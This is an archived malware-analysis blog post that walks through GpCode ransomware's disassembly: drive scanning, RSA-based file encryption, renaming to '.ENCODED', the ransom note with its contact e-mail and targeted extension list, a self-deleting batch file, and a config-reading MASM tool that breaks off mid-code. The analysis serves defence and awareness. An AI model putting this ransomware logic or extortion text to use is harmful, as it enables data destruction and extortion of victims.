{
	"id": "6bc338fe-0aef-4640-babd-0ec3c194c281",
	"created_at": "2026-04-06T01:29:28.674747Z",
	"updated_at": "2026-04-10T03:35:21.468904Z",
	"deleted_at": null,
	"sha1_hash": "f9a69181f77341e01f90c7e194451bcc97779044",
	"title": "GpCode Ransomware 2010 Simple Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2269993,
	"plain_text": "GpCode Ransomware 2010 Simple Analysis\r\nArchived: 2026-04-06 00:44:16 UTC\r\nPDF available here\r\nHi, firstly: sorry for my bad English. It's not my native language (I'M FRENCH)\r\nWell, I’ve wanted to make a post about that a long time ago but I was really bored to have a look at it.\r\nFinally I did it because no one seem done it before (or no one have the sample to work at it?)\r\nSo let's start directly, if you want to know more about GpCode story, have a look at this post:\r\nhttp://www.securelist.com/en/blog/333/GpCode_like_Ransomware_Is_Back\r\nSome technical informations about the file:\r\nCRC32: CCDFBD05\r\nMD5: b14c45c1792038fd69b5c75e604242a3\r\nSHA1: 54ab323053f1138e5ccaa8f8afaa38cabca9491f\r\nPacker: UPX 0.89.6 - 1.02 / 1.05 - 2.90 -\u003e Markus \u0026 Laszlo\r\nCompiler: MASM/TASM\r\nFile size: 10,5 Kb (10 752 bytes)\r\nOEP: 00011790\r\nAlso known as: Trojan.Gpcoder.G (Symantec), GPcoder.j (McAfee), Trojan:Win32/Ransom.BQ (Microsoft),\r\nTROJ_RANSOM.EWQ (TrendMicro), Troj/Ransom-U (Sophos)\r\n\"Main place\" in Ollydbg:\r\nOEP: 0x401990 (When unpacked)\r\nText version:\r\n00401990 \u003e/$  E8 48FCFFFF   CALL 004015DD                      ;  1.004015DD\r\n00401995  |.  85C0          TEST EAX,EAX\r\n00401997  |.  0F84 80000000 JE 00401A1D                        ;  1.00401A1D\r\n0040199D  |.  68 2E304000   PUSH 40302E                        ; /MutexName = \"ilold\"\r\n004019A2  |.  6A 00         PUSH 0                             ; |Inheritable = FALSE\r\n004019A4  |.  68 01001F00   PUSH 1F0001                        ; |Access = 1F0001\r\n004019A9  |.  E8 12010000   CALL 00401AC0                      ; \\OpenMutexA\r\n004019AE  |.  85C0          TEST EAX,EAX\r\n004019B0  |.  75 6B         JNZ SHORT 00401A1D                 ;  1.00401A1D\r\n004019B2  |.  68 2E304000   PUSH 40302E                        ; /MutexName = \"ilold\"\r\n004019B7  |.  6A 00         PUSH 0                             ; |InitialOwner = FALSE\r\n004019B9  |.  6A 00         PUSH 0                             ; |pSecurity = NULL\r\n004019BB  |.  E8 9A000000   CALL 00401A5A                      ; \\CreateMutexA\r\n004019C0  |.  E8 3BF6FFFF   CALL 00401000                      ;  1.00401000\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 1 of 18\n\n004019C5  |.  85C0          TEST EAX,EAX\r\n004019C7  |.  74 54         JE SHORT 00401A1D                  ;  1.00401A1D\r\n004019C9  |.  E8 A3F8FFFF   CALL 00401271                      ;  1.00401271\r\n004019CE  |.  33C0          XOR EAX,EAX\r\n004019D0  |.  50            PUSH EAX                           ; /pThreadId =\u003e NULL\r\n004019D1  |.  50            PUSH EAX                           ; |CreationFlags =\u003e 0\r\n004019D2  |.  50            PUSH EAX                           ; |pThreadParm =\u003e NULL\r\n004019D3  |.  68 35134000   PUSH 401335                        ; |ThreadFunction = 1.00401335\r\n004019D8  |.  50            PUSH EAX                           ; |StackSize =\u003e 0\r\n004019D9  |.  50            PUSH EAX                           ; |pSecurity =\u003e NULL\r\n004019DA  |.  E8 81000000   CALL 00401A60                      ; \\CreateThread\r\n004019DF  |.  6A 01         PUSH 1                             ; /ErrorMode = SEM_FAILCRITICALERRORS\r\n004019E1  |.  E8 EC000000   CALL 00401AD2                      ; \\SetErrorMode\r\n004019E6  |.  E8 A5000000   CALL 00401A90                      ; [GetLogicalDrives\r\n004019EB  |.  B9 19000000   MOV ECX,19\r\n004019F0  |\u003e  BB 01000000   /MOV EBX,1\r\n004019F5  |.  D3E3          |SHL EBX,CL\r\n004019F7  |.  23D8          |AND EBX,EAX\r\n004019F9  |.  74 1F         |JE SHORT 00401A1A                 ;  1.00401A1A\r\n004019FB  |.  80C1 41       |ADD CL,41\r\n004019FE  |.  880D 70304000 |MOV BYTE PTR DS:[403070],CL\r\n00401A04  |.  80E9 41       |SUB CL,41\r\n00401A07  |.  C705 71304000\u003e|MOV DWORD PTR DS:[403071],2A5C3A\r\n00401A11  |.  50            |PUSH EAX\r\n00401A12  |.  51            |PUSH ECX\r\n00401A13  |.  E8 EEFDFFFF   |CALL 00401806                     ;  1.00401806\r\n00401A18  |.  59            |POP ECX\r\n00401A19  |.  58            |POP EAX\r\n00401A1A  |\u003e  49            |DEC ECX\r\n00401A1B  |.^ 7D D3         \\JGE SHORT 004019F0                ;  1.004019F0\r\n00401A1D  |\u003e  68 F4010000   PUSH 1F4                           ; /Timeout = 500. ms\r\n00401A22  |.  E8 BD000000   CALL 00401AE4                      ; \\Sleep\r\n00401A27  |.  833D 34304000\u003eCMP DWORD PTR DS:[403034],1\r\n00401A2E  |.^ 75 ED         JNZ SHORT 00401A1D                 ;  1.00401A1D\r\n00401A30  |.  E8 90F6FFFF   CALL 004010C5                      ;  1.004010C5\r\n00401A35  |.  E8 33FDFFFF   CALL 0040176D                      ;  1.0040176D\r\n00401A3A  |.  6A 00         PUSH 0                             ; /ExitCode = 0\r\n00401A3C  \\.  E8 25000000   CALL 00401A66                      ; \\ExitProcess\r\nIn the first call, GpCode will load, and lock a resource.\r\n004015F4  |.  6A 0A         PUSH 0A                            ; /ResourceType = RT_RCDATA\r\n004015F6  |.  68 65304000   PUSH 403065                        ; |ResourceName = \"cfg\"\r\n004015FB  |.  6A 00         PUSH 0                             ; |hModule = NULL\r\n004015FD  |.  E8 7C040000   CALL 00401A7E                      ; \\FindResourceA\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 2 of 18\n\nScreenshot of grabbed data:\r\nAccording to the first bytes this is not a valid PE file (So, why moving this?).\r\nWell:\r\n0040160D  |.  50            PUSH EAX                           ; /hResource\r\n0040160E  |.  6A 00         PUSH 0                             ; |hModule = NULL\r\n00401610  |.  E8 C9040000   CALL 00401ADE                      ; \\SizeofResource\r\n00401615  |.  0BC0          OR EAX,EAX\r\n00401617  |.  75 04         JNZ SHORT 0040161D                 ;  GpCode.0040161D\r\n00401619  |.  33C0          XOR EAX,EAX\r\n0040161B  |.  C9            LEAVE\r\n0040161C  |.  C3            RETN\r\nHere it grabs the size of the resource, eax will contain 0000055D (1373)\r\nNote: The screenshot of resource hacker also indicate the size.\r\nWhen it's done, it gets free memory by GlobalAlloc (at eax: 00175158)\r\nWith the specified size: 55D\r\n00401646  |.  FF75 F0       PUSH DWORD PTR SS:[EBP-10]          ; /MemSize\r\n00401649  |.  6A 40         PUSH 40                             ; |Flags = GPTR\r\n0040164B  |.  E8 52040000   CALL 00401AA2                       ; \\GlobalAlloc\r\n00401650  |.  0BC0          OR EAX,EAX\r\nThen, it does a copy to the following memory (00175158)\r\n0040165D  |.  FF75 F0       PUSH DWORD PTR SS:[EBP-10]          ; /Length = 55D (1373.)\r\n00401660  |.  FF75 FC       PUSH DWORD PTR SS:[EBP-4]           ; |Source = GpCode.0040F474\r\n00401663  |.  FF75 EC       PUSH DWORD PTR SS:[EBP-14]          ; |Destination = 00175158\r\n00401666  |.  E8 61040000   CALL 00401ACC                       ; \\RtlMoveMemory\r\n0040166B  |.  FF75 F8       PUSH DWORD PTR SS:[EBP-8]           ; /hResource  = 0040F474\r\n0040166E  |.  E8 11040000   CALL 00401A84                       ; \\FreeResource\r\n00401673  |.  8B5D EC       MOV EBX,DWORD PTR SS:[EBP-14]\r\n00401676  |.  6A 10         PUSH 10                             ; /Length = 10 (16.)\r\n00401678  |.  53            PUSH EBX                            ; |Source = 00175158\r\n00401679  |.  68 70444000   PUSH 404470                         ; |Destination = GpCode.00404470\r\n0040167E  |.  E8 49040000   CALL 00401ACC                       ; \\RtlMoveMemory\r\nJust after doing this, it goes to another call\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 3 of 18\n\nIn this call it will decrypt the data contained at 00175158 (seems interesting now)\r\nAt the end of loop:\r\nWe got a clear text with also a list of extensions which will be encrypted:\r\n- .jpg\r\n- .jpeg\r\n- .psd\r\n- .cdr\r\n- .dwg\r\n- .max\r\n- .mov\r\n- .m2v\r\n- .3gp\r\n- .doc\r\n- .docx\r\n- .xls\r\n- .xlsx\r\n- .ppt\r\n- .pptx\r\n- .rar\r\n- .zip\r\n- .mdb\r\n- .mp3\r\n- .cer\r\n- .p12\r\n- .pfx\r\n- .kwm\r\n- .pwm\r\n- .txt\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 4 of 18\n\n- .pdf\r\n- .avi\r\n- .flv\r\n- .lnk\r\n- .bmp\r\n- .1cd\r\n- .md\r\n- .mdf\r\n- .dbf\r\n- .mdb\r\n- .odt\r\n- .vob\r\n- .ifo\r\n- .mpeg\r\n- .mpg\r\n- .doc\r\n- .docx\r\n- .xls\r\n- .xlsx\r\n.bat .sys .exe .ini files will not be attacked because the system uses all of them.\r\nAnd the goal of GpCode is not to crash the system.\r\nSo, he returns to the call and move again the memory to another place.\r\nWith selecting this time a block of bytes (398) and move it to 00175BB8\r\n004016CD  |.  57            PUSH EDI                            ; /Length = 398 (920.)\r\n004016CE  |.  53            PUSH EBX                            ; |Source = 00175172\r\n004016CF  |.  FF35 88444000 PUSH DWORD PTR DS:[404488]          ; |Destination = 00175BB8\r\n004016D5  |.  E8 F2030000   CALL 00401ACC                       ; \\RtlMoveMemory\r\nBlock of 398 bytes:\r\n00175BA8                       Attention!!!    ..All your personal files (\r\n00175BE8  photo, documents, texts, databases, certificates, kwm-files, vid\r\n00175C28  eo) have been encrypted by a very strong cypher RSA-1024. The or\r\n00175C68  iginal files are deleted.  You can check this by yourself - just\r\n00175CA8   look for files in all folders... There is no possibility to dec\r\n00175CE8  rypt these files without a special decrypt program! Nobody can h\r\n00175D28  elp you - even don't try to find another method or tell anybody.\r\n00175D68   Also after n days all encrypted files will be completely delete\r\n00175DA8  d and you will have no chance to get it back. .. We can help to\r\n00175DE8  solve this task for 120$ via wire transfer (bank transfer SWIFT/\r\n00175E28  IBAN). And remember: any harmful or bad words to our side will b\r\n00175E68  e a reason for ingoring your message and nothing will be done...\r\n00175EA8  For details you have to send your request on this e-mail (attach\r\n00175EE8   to message a full serial key shown below in this 'how to..' fil\r\n00175F28  e on desktop):   datafinder@fastmail.fm\r\nAfter, another block is moved (271 bytes)\r\n0040170A  |.  FF35 80444000 PUSH DWORD PTR DS:[404480]          ; /Length = 10F (271.)\r\n00401710  |.  53            PUSH EBX                            ; |Source = 00175512\r\n00401711  |.  FF35 8C444000 PUSH DWORD PTR DS:[40448C]          ; |Destination = 001756C0\r\n00401717  |.  E8 B0030000   CALL 00401ACC                       ; \\RtlMoveMemory\r\nThe block of bytes moved, you guessed it?:\r\n001756C0  *.jpg.*.jpeg.*.psd.*.cdr.*.dwg.*.max.*.mov.*.m2v.*.3gp.*.doc.*.d\r\n00175700  ocx.*.xls.*.xlsx.*.ppt.*.pptx.*.rar.*.zip.*.mdb.*.mp3.*.cer.*.p1\r\n00175740  2.*.pfx.*.kwm.*.pwm.*.txt.*.pdf.*.avi.*.flv.*.lnk.*.bmp.*.1cd.*.\r\n00175780  md.*.mdf.*.dbf.*.mdb.*.odt.*.vob.*.ifo,.*.mpeg.*.mpg.*.doc.*.doc\r\n001757C0  x.*.xls.*.xlsx\r\nAfter that he returns to the \"Main place\" (screenshot 1)\r\nAnd Create the mutex \"ilold\"\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 5 of 18\n\n004019B2  |.  68 2E304000   PUSH 40302E                         ; /MutexName = \"ilold\"\r\n004019B7  |.  6A 00         PUSH 0                              ; |InitialOwner = FALSE\r\n004019B9  |.  6A 00         PUSH 0                              ; |pSecurity = NULL\r\n004019BB  |.  E8 9A000000   CALL 00401A5A                       ; \\CreateMutexA\r\nThen it goes to a call.. a crypto procedure\r\n004019C0  |.  E8 3BF6FFFF   CALL 00401000                       ;  GpCode.00401000\r\nWell I'm not very good to explain crypto stuff\r\nSo I will make it simple: it generate a key then it store it and use GlobalAlloc to set a free memory place.\r\nI will give you some screenshot if you have a better level than me you will surely understand\r\n00401050  |.  E8 DD0A0000   CALL 00401B32                       ;  \u003cJMP.\u0026advapi32.CryptExportKey\u003e\r\n00401055  |.  FF35 A2444000 PUSH DWORD PTR DS:[4044A2]          ; /MemSize = 2C (44.)\r\n0040105B  |.  6A 40         PUSH 40                             ; |Flags = GPTR\r\n0040105D  |.  E8 400A0000   CALL 00401AA2                       ; \\GlobalAlloc\r\nHex dump of address 4044A2:\r\nThen it also gets free memory at 0017CD30:\r\n004010A0  |.  E8 A50A0000   CALL 00401B4A                       ;  \u003cJMP.\u0026advapi32.CryptSetKeyParam\u003e\r\n004010A5  |.  68 00000100   PUSH 10000                          ; /MemSize = 10000 (65536.)\r\n004010AA  |.  6A 40         PUSH 40                             ; |Flags = GPTR\r\n004010AC  |.  E8 F1090000   CALL 00401AA2                       ; \\GlobalAlloc\r\n004010B1  |.  0BC0          OR EAX,EAX\r\nTake 44 from 0017B928 and move it 008F0020\r\n004012D2  |.  FF35 A2444000 PUSH DWORD PTR DS:[4044A2]          ; /Length = 2C (44.)\r\n004012D8  |.  FF35 A6444000 PUSH DWORD PTR DS:[4044A6]          ; |Source = 0017B928\r\n004012DE  |.  FF35 C8444000 PUSH DWORD PTR DS:[4044C8]          ; |Destination = 008F0020\r\n004012E4  |.  E8 E3070000   CALL 00401ACC                       ; \\RtlMoveMemory\r\nAnd what we see in the source?\r\nCall CryptEncrypt, used for RSA:\r\n0040130C  |.  E8 1B080000   CALL 00401B2C                       ;  \u003cJMP.\u0026advapi32.CryptEncrypt\u003e\r\nAfter it creates a thread and retrieves a bitmask representing the currently available disk drives.\r\nThen we enter in a loop.\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 6 of 18\n\nThe return value from GetLogicalDrives is a bitmask representing the currently available disk drives.\r\nBit position 0 (the least-significant bit) is drive A, bit position 1 is drive B, bit position 2 is drive C, and so on.\r\nOn the loop, we will start from 25 (Drive Z) and when a number is found for example 'D' (who have the position 3)\r\nYou will not take the \"jump if equal\", enter in a call *do something* and then return in the loop for continue, next letters\r\nposition 2: \"C\"\r\nI name this place \"Core\" because all will be decided inside this procedure for data.\r\nLet's see what he is doing to 'D'\r\n00401806  /$  55            PUSH EBP\r\n00401807  |.  8BEC          MOV EBP,ESP\r\n00401809  |.  81EC 44010000 SUB ESP,144\r\n0040180F  |.  8D85 BCFEFFFF LEA EAX,DWORD PTR SS:[EBP-144]\r\n00401815  |.  50            PUSH EAX                            ; /pFindFileData\r\n00401816  |.  68 70304000   PUSH 403070                         ; |FileName = \"D:\\*\"\r\n0040181B  |.  E8 52020000   CALL 00401A72                       ; \\FindFirstFileA\r\n00401820  |.  40            INC EAX\r\n00401821  |.  0F84 67010000 JE 0040198E                         ;  1.0040198E\r\nHe does... NOTHiNG.\r\n'D' was my CD drive and there is no CD inside (FindFirstFileA is an explicit API right?) so eax return FFFFFFFF\r\nHe take the jump which leave the procedure.\r\n0040198E  |\u003e \\C9            LEAVE\r\n0040198F  \\.  C3            RETN\r\nBut what's about my local disk 'C' who is the next ?\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 7 of 18\n\nThere is a blacklisted file \"HOW TO DECRYPT FILES.txt\"\r\nIf the ransomware found this file, he will quit the routine:\r\n004018CF  |.  53            |PUSH EBX                           ; /String2\r\n004018D0  |.  68 38304000   |PUSH 403038                        ; |String1 = \"HOW TO DECRYPT FILES.txt\"\r\n004018D5  |.  E8 22020000   |CALL 00401AFC                      ; \\lstrcmpiA\r\n004018DA  |.  85C0          |TEST EAX,EAX\r\n004018DC  |.  0F84 8D000000 |JE 0040196F                        ;  1.0040196F\r\nIt does another check after, but we dont know wich file for the moment.\r\n004018CF  |.  53            |PUSH EBX                           ; /String2\r\n004018D0  |.  68 38304000   |PUSH 403038                        ; |String1 = \"HOW TO DECRYPT FILES.txt\"\r\n004018D5  |.  E8 22020000   |CALL 00401AFC                      ; \\lstrcmpiA\r\n004018DA  |.  85C0          |TEST EAX,EAX\r\n004018DC  |.  0F84 8D000000 |JE 0040196F                        ;  1.0040196F\r\n004018E8  |.  53            |PUSH EBX                           ; /String2\r\n004018E9  |.  68 644F4000   |PUSH 404F64                        ; |String1 = \"\"\r\n004018EE  |.  E8 09020000   |CALL 00401AFC                      ; \\lstrcmpiA\r\nThat will be bad if the ransomware encode it's own stuff -.^ (to be continued)\r\nAfter this check, the ransomware 'create' a path to the file\r\n004018FD  |.  50            |PUSH EAX                           ; /StringToAdd = \"AUTOEXEC.BAT\"\r\n004018FE  |.  68 70354000   |PUSH 403570                        ; |ConcatString = \"C:\\AUTOEXEC.BAT\"\r\n00401903  |.  E8 E8010000   |CALL 00401AF0                      ; \\lstrcatA\r\nAnd then it check the extention of the file:\r\n00401914  |\u003e /51            |/PUSH ECX\r\n00401915  |. |53            ||PUSH EBX                          ; /Wildcard\r\n00401916  |. |68 70354000   ||PUSH 403570                       ; |Path = \"C:\\AUTOEXEC.BAT\"\r\n0040191B  |. |E8 36020000   ||CALL 00401B56                     ; \\PathMatchSpecA\r\n00401920  |. |83F8 01       ||CMP EAX,1\r\n00401923  |. |75 03         ||JNZ SHORT 00401928                ;  1.00401928\r\n00401925  |. |59            ||POP ECX\r\n00401926  |. |EB 10         ||JMP SHORT 00401938                ;  1.00401938\r\n00401928  |\u003e |53            ||PUSH EBX                          ; /String\r\n00401929  |. |E8 E0010000   ||CALL 00401B0E                     ; \\lstrlenA\r\n0040192E  |. |03D8          ||ADD EBX,EAX\r\n00401930  |. |83C3 01       ||ADD EBX,1\r\n00401933  |. |59            ||POP ECX\r\n00401934  |.^\\E2 DE         |\\LOOPD SHORT 00401914              ;  1.00401914\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 8 of 18\n\nThe \".bat\" extension is not in the 'list' of extension to crypt so he simply leave with this line.\r\n00401936  |. /EB 37         |JMP SHORT 0040196F                 ;  1.0040196F\r\nAnd proceed to the next file:\r\n00401975  |.  50            |PUSH EAX                           ; /pFindFileData\r\n00401976  |.  FF75 FA       |PUSH DWORD PTR SS:[EBP-6]          ; |hFile\r\n00401979  |.  E8 FA000000   |CALL 00401A78                      ; \\FindNextFileA\r\n0040197E  |.  85C0          |TEST EAX,EAX\r\n00401980  |.^ 0F85 A5FEFFFF \\JNZ 0040182B                       ;  1.0040182B\r\n0040197E  |.  85C0          |TEST EAX,EAX\r\n00401986  |.  FF75 FA       PUSH DWORD PTR SS:[EBP-6]           ; /hSearch\r\n00401989  |.  E8 DE000000   CALL 00401A6C                       ; \\FindClose\r\n0040198E  |\u003e  C9            LEAVE\r\n0040198F  \\.  C3            RETN\r\nTo test the procedure i've made a txt file called \"AUTOEXEC.txt\"\r\nThis time it detects the extension .txt and dont take the conditional jump:\r\n00401923  |. /75 03         ||JNZ SHORT 00401928                ;  1.00401928\r\n00401925  |. |59            ||POP ECX\r\n00401926  |. |EB 10         ||JMP SHORT 00401938                ;  1.00401938\r\nit jump here:\r\n00401938  |\u003e \\68 70354000   |PUSH 403570                        ; /Arg1 = 00403570 ASCII \"C:\\AUTOEXEC.txt\"\r\n0040193D  |.  E8 9CF7FFFF   |CALL 004010DE                      ; \\1.004010DE\r\n00401942  |.  68 70354000   |PUSH 403570                        ; /String2 = \"C:\\AUTOEXEC.txt\"\r\n00401947  |.  68 703A4000   |PUSH 403A70                        ; |String1 = 1.00403A70\r\n0040194C  |.  E8 B1010000   |CALL 00401B02                      ; \\lstrcpyA\r\n00401951  |.  68 00304000   |PUSH 403000                        ; /StringToAdd = \".ENCODED\"\r\n00401956  |.  68 703A4000   |PUSH 403A70                        ; |ConcatString = \"\"\r\n0040195B  |.  E8 90010000   |CALL 00401AF0                      ; \\lstrcatA\r\n00401960  |.  68 703A4000   |PUSH 403A70                        ; /NewName = \"\"\r\n00401965  |.  68 70354000   |PUSH 403570                        ; |ExistingName = \"C:\\AUTOEXEC.txt\"\r\n0040196A  |.  E8 4B010000   |CALL 00401ABA                      ; \\MoveFileA\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 9 of 18\n\nWhat do we see ?\r\nHe takes the full patch to the file, then it enters to a procedure and do something\r\nAfter the return, it renames the file with the extension \".ENCODED\"\r\nAnd continue to check for other files.\r\nLet's enter inside the call now.\r\n00401109  |.  6A 00         PUSH 0                              ; /pFileSizeHigh = NULL\r\n0040110B  |.  FF75 FC       PUSH DWORD PTR SS:[EBP-4]           ; |hFile\r\n0040110E  |.  E8 77090000   CALL 00401A8A                       ; \\GetFileSize\r\n00401113  |.  8945 F8       MOV DWORD PTR SS:[EBP-8],EAX\r\n00401116  |.  83F8 10       CMP EAX,10\r\n00401119  |.  0F8C 41010000 JL 00401260                         ;  1.00401260\r\nInteresting thing is this size check, files under 11 bytes are not crypted\r\nlike my AUTOEXEC.txt which have 4 bytes \"test\"\r\nHe takes the conditional jump and we are here:\r\n00401260  |\u003e \\FF75 FC       PUSH DWORD PTR SS:[EBP-4]           ; /hObject = 00000054\r\n00401263  |.  E8 E6070000   CALL 00401A4E                       ; \\CloseHandle\r\n00401268  |.  B8 01000000   MOV EAX,1\r\n0040126D  |.  C9            LEAVE\r\n0040126E  \\.  C2 0400       RETN 4\r\nIt closes the handle and returns to the \"core\" nothing was encoded inside the txt\r\nI think it doesn't crypt files under 10 bytes for win time, 10 bytes files are useless.\r\nAnd it needs to crypt datas as fast as possible.\r\nIt adds anyway to the files under 10 bytes the extension .ENCODED [iS THAT A BUG????]\r\n(A basic victim will think all is crypted right?)\r\nSo it will continue to proceed next files and finally after some attempt the 2nd thread start\r\n00401335  /$  FF35 92444000 PUSH DWORD PTR DS:[404492]          ; /Time = 0,\r\n0040133B  |.  E8 A4070000   CALL \u003cJMP.\u0026KERNEL32.Sleep\u003e          ; \\KERNEL32.Sleep\r\n00401340  |.  E8 0B000000   CALL 00401350\r\n00401345  |.  C705 34304000 MOV DWORD PTR DS:[403034],1\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 10 of 18\n\n0040134F  \\.  C3            RETN\r\n00401350  /$  55            PUSH EBP\r\nGpCode will create a TXT file on your desktop\r\nUsing SHGetSpecialFolderPathA api to find the desktop path.\r\nIt create and write inside a file called “HOW TO DECRYPT FILES.txt”\r\nThen it goes to a loop for the RSA key, and write it at the end of file (HOW TO DECRYPT FILES.txt)\r\nExample of file maked:\r\n           Attention!!!  \r\nAll your personal files (photo, documents, texts, databases, certificates, kwm-files, video) have been encrypted by a very\r\nstrong cypher RSA-1024. The original files are deleted.  You can check this by yourself - just look for files in all folders.\r\n There is no possibility to decrypt these files without a special decrypt program! Nobody can help you - even don't try to find\r\nanother method or tell anybody. Also after n days all encrypted files will be completely deleted and you will have no chance\r\nto get it back.\r\n We can help to solve this task for 120$ via wire transfer (bank transfer SWIFT/IBAN). And remember: any harmful or bad\r\nwords to our side will be a reason for ingoring your message and nothing will be done.\r\nFor details you have to send your request on this e-mail (attach to message a full serial key shown below in this 'how to..'\r\nfile on desktop):   datafinder@fastmail.fm\r\n2334CC172CF6F6CCEA5F1090E2B2990FA2A933CD099B9295B0E3750A9CA26D89E18B2143E1899B761AE81C44DD164F6B36C81340A8943918\r\n6CE8BE3590ED19C04969F7C4FE074D0C3976788135781AE889A72FA349A8FF0AE749E26E77FC065D251C389115C4AA98D4C4554CA2FFE9B8\r\nAfter it changes your wallpaper\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 11 of 18\n\nResource hacker:\r\nSearching the bitmap resource and drop it in %temp% folder with a random name.\r\nThen it calls an API to set it as wallpaper, with stretch option to fill your entire screen.\r\nDesktop:\r\nThen it continue to search for other files to crypt\r\nAnd now we know the dropped bitmap is the second blacklisted file.\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 12 of 18\n\nLet's follow this \"brndlog.txt\" located in:\r\nC:\\Documents and Settings\\Administrateur\\Application Data\\Microsoft\\Internet Explorer\r\nIt create a handle to the file with GENERIC_READ and use GetFileSize to check if we should encrypt it or not.\r\nAfter the size check, it use SetFilePointer Function to stores the file pointer in two LONG values\r\nThen it reads the file and store data in a buffer, then it calls CryptEncrypt on the data stored.\r\nAfter it writes the file (brndlog.txt) with new data.\r\nNow it returns to the core, to add the extention .ENCODED and proceed to the next file.\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 13 of 18\n\nOnce all drives are “crypted”, it quit the \"core\" and return to the \"main place\"\r\nIt will enter in two procedures and call an API to close the program\r\nThe first procedure:\r\nIt destroys the key and releases the handle of CSP\r\nSecond procedure:\r\nIt creates a file called \"ntfs_system.bat\" (in the same folder as the ransomware)\r\nwhich contains:\r\ndel \"C:\\Documents and Settings\\Administrateur\\Bureau\\1.exe\"\r\ndel %0\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 14 of 18\n\nAnd execute it, then it Calls the ExitPocess API to close the program\r\nAnd \"ntfs_system.bat\" will delete GpCode from our system\r\nAll your data are crypted with an executable of 25Kb and there is no possibility to recover them until paying the ransom...\r\nThe malware author claim on the txt file:\r\n\"after n days all encrypted files will be completely deleted and you will have no chance to get it back.\"\r\nLike we have see, there is absolutely nothing inside the code for do such action.\r\nIt says that just to scare users, pushing them into buying the 'special decrypt program'\r\nAlso, people who are not should be aware of the problem and should recognize GpCode from the first and second when the\r\n“warnings” appears on your screen.\r\nPushing Reset/Power button of your PC can save a significant amount of your valuable data\r\nAnd GpCode dont create a startup key so you can boot safe after an infection.\r\nConclusion: Backup your data from time to time in a safe place, and dont forget to unplug the storage device which\r\ncontains these saved data.\r\nBonus, a tiny app useless who read the cfg file from gpcode :)\r\n.486\r\n.model  flat, stdcall\r\noption  casemap :none   ; case sensitive\r\ninclude windows.inc\r\nuselib  MACRO   libname\r\n    include     libname.inc\r\n    includelib  libname.lib\r\nENDM\r\nuselib  user32\r\nuselib  kernel32\r\nDlgProc     PROTO :DWORD,:DWORD,:DWORD,:DWORD\r\nIDC_OK          equ 1003\r\nIDC_IDCANCEL    equ 1004\r\ncfg             equ 1\r\n.data?\r\nhInstance       dd      ?   ;dd can be written as dword\r\nbuffer1 db 9999 dup(?)\r\nbuffer2 db 9999 dup(?)\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 15 of 18\n\nbuffer3 db 256 dup(?)\r\nbuffer4 db 256 dup(?)\r\nnSize dd     ?\r\npM  dd     ?\r\n.code\r\nstart:\r\n    invoke  GetModuleHandle, NULL\r\n    mov hInstance, eax\r\n    invoke  DialogBoxParam, hInstance, 101, 0, ADDR DlgProc, 0\r\n    invoke  ExitProcess, eax\r\nDlgProc proc    hWin    :DWORD,\r\n        uMsg    :DWORD,\r\n        wParam  :DWORD,\r\n        lParam  :DWORD\r\n    .if uMsg == WM_COMMAND\r\n        .if wParam == IDC_OK\r\n INVOKE FindResource,0, cfg, RT_RCDATA\r\n push eax\r\n INVOKE SizeofResource,0, eax\r\n mov nSize, eax\r\n pop eax\r\n INVOKE LoadResource,0, eax\r\n INVOKE LockResource, eax\r\n mov esi, eax\r\n mov eax, nSize\r\n add eax, SIZEOF nSize\r\n INVOKE GlobalAlloc, GPTR, eax\r\n mov pM, eax\r\n mov ecx, nSize\r\n mov dword ptr [eax], ecx\r\n add eax, SIZEOF nSize\r\n mov edi, eax\r\n rep movsb\r\n        PUSH 55Dh\r\n        PUSH eax\r\n        PUSH offset buffer1\r\n        CALL RtlMoveMemory\r\n        invoke FreeResource,eax\r\n        mov ebx,offset buffer1\r\n        PUSH 10h\r\n        PUSH ebx\r\n        PUSH offset buffer2\r\n        CALL RtlMoveMemory\r\n        ADD EBX,010h\r\n        MOV EAX,nSize\r\n        SUB EAX,010h\r\n        PUSH EAX\r\n        PUSH EBX\r\n        CALL decrypt\r\n        MOV AL,BYTE PTR DS:[EBX]\r\n        MOV BYTE PTR DS:[buffer3],AL\r\n        ADD EBX,1\r\n        MOV AL,BYTE PTR DS:[EBX]\r\n        MOV BYTE PTR DS:[buffer3+1],AL\r\n        ADD EBX,1\r\n        MOV EAX,DWORD PTR DS:[EBX]\r\n        MOV DWORD PTR DS:[buffer3+2],EAX\r\n        ADD EBX,8\r\n        MOV ECX,DWORD PTR DS:[EBX]\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 16 of 18\n\ninvoke SetDlgItemText,hWin,1002,ebx\r\n         pop esi\r\n        .elseif wParam == IDC_IDCANCEL\r\n            invoke EndDialog,hWin,0\r\n        .endif\r\n    .elseif uMsg == WM_CLOSE\r\n        invoke  EndDialog,hWin,0\r\n    .endif\r\n    xor eax,eax\r\n    ret\r\nDlgProc endp\r\ndecrypt proc\r\n        PUSHAD\r\n        MOV ESI,EBX\r\n        MOV EDI,ESI\r\n        XOR EDX,EDX\r\n        MOV ECX,EAX\r\n@gpcode_00401755:\r\n        CMP EDX,010h\r\n        JNZ @gpcode_0040175C\r\n        XOR 